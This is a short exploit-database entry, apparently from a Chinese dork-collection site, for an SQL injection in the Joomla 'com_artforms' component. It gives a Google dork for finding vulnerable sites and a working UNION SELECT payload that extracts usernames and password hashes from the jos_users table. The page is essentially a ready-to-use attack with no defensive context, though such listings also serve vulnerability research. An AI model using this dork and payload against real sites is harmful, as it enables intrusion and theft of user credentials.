inurl:/index.php?option=com_artforms

• SHDB
• 1977 阅读

• 日期：2017-01-23
• 类别：
  • Advisories and Vulnerabilities
• 作者：anonymous
• 语法：inurl:/index.php?option=com_artforms

• # Exploit Title : ----------- :Joomla "com_artforms" component SQL Injection

  # Author : ----------------- : importantTR

  # Google Dork : --------- : -inurl:/index.php?option=com_artforms

  # Date : -------------------- : 20/01/2017

  # Platform : --------------- : Joomla

  ########## 1-SQL Injection ##########

  index.php?option=com_artforms&task=ferforms&viewform=[SQLi]

  ##### SQLi Parameter :

  /index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x4a,username,password%29,3,4,5,6%20from%20jos_users%23

  ########## AYYILDIZ TIM ##########

  https://www.exploit-db.com/exploits/14263/